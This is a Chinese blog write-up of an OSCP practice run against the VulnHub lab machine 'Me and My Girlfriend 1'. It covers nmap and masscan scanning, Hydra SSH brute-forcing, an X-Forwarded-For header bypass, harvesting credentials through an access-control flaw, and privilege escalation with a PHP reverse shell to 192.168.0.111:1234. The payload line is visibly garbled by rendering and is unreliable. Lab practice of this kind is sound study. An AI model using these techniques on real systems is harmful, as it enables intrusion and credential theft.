oscp—Me and My Girlfriend 1练习

0x00 前言

为oscp做准备的练习,Me and My Girlfriend 1。由于不知道怎么练习,就随便下载了一个进行练习在这里做一个笔记。

目标地址:

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

0x01 实验

下载好文件之后,配置为NET模式。

1.目标探测

探测这里使用了nmap进行探测,可以看到时间为10.4秒。

nmap -sP -T4 192.168.25.1/24

在这里插入图片描述
这里也可以使用masscan 进行扫描,可以明显感觉速度变快了。

masscan --ping 192.168.25.1/24 --rate 100000000000000000000000

然后就是对其端口进行扫描

在这里插入图片描述
在这里插入图片描述
感觉速度上的差异还是有一点的,个人还是更喜欢使用nmap。

2.攻击尝试

2.1 端口尝试

这里开放了22和80端口,这里的22可以爆破一下试一下。
先用hydra对ssh进行爆破,但是未果。
在这里插入图片描述

2.2 web尝试

开放了80端口,进行访问
在这里插入图片描述
bp重放可看到提示可能和x-forwarded-for相关
在这里插入图片描述
提示x-forwarded-for,那就直接输入127.0.0.1

填写之后发现进行了跳转
在这里插入图片描述
依旧提示这个
在这里插入图片描述
看来每一个包都要加上x-forwarded-for
可以使用Modify Headers工具进行配置
在这里插入图片描述
访问之后:
在这里插入图片描述
这里直接进行注册
在这里插入图片描述
登录之后,有一个修改密码的地方
在这里插入图片描述
这里看到id,肯定是要尝试sql注入的。但是sqlmap跑了一下无果

这里还可能存在越权,可以获取其他的用户在这里插入图片描述
练习爬虫虽然没有意义,但是还是写一下。
照列,脚本放在github上

这个是爬取的用户名和密码,使用hydra进行爆破尝试
在这里插入图片描述
在这里插入图片描述
hydra爆破
在这里插入图片描述
使用ssh进行连接,就可以登录。
在这里插入图片描述
可以看到这里是一个普通用户的权限。
在用户目录下可以找到一些内容
在.my_secret文件下的隐藏文件
并且提示说要进行提权在这里插入图片描述
这样就拿到了第一个flag

然后再到www目录下查看一下,可以在config内存中找到mysql连接的方式
在这里插入图片描述
连接之后发现没有什么内容。

然后这里可以使用su进行提权
密码使用ctf_pasti_bisa即可。

中间其实还使用了root进行一个ssh连接,但是应该是做了限制,所以没有办法进行直接ssh连接。

然后使用find -name "flag*"进行文件查找
在这里插入图片描述

另外一种思路

这里常规的思路是直接使用sudo -l进行查看,看是否有可执行权限
在这里插入图片描述
这里看到一个root 权限的php

直接反弹一个shell回来就能获取root权限

sudo -u root php -f ‘ s o c k = f s o c k o p e n ( " 192.168.0.111 " , 1234 ) ; sock=fsockopen("192.168.0.111",1234); sock=fsockopen("192.168.0.111",1234);proc=proc_open("/bin/sh -i", array(0=> s o c k , 1 = > sock, 1=> sock,1=>sock, 2=> s o c k ) , sock), sock),pipes);’

如果不成功可以多尝试几次,或者直接使用其他的反弹shell
在这里插入图片描述
查看flag
一般root的flag都在/root文件夹下
在这里插入图片描述

0x03.总结

整个过程其实主要思路就是
越权拿到密码,然后登录ssh,然后提权。
之后又想到了用php提权的方法

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页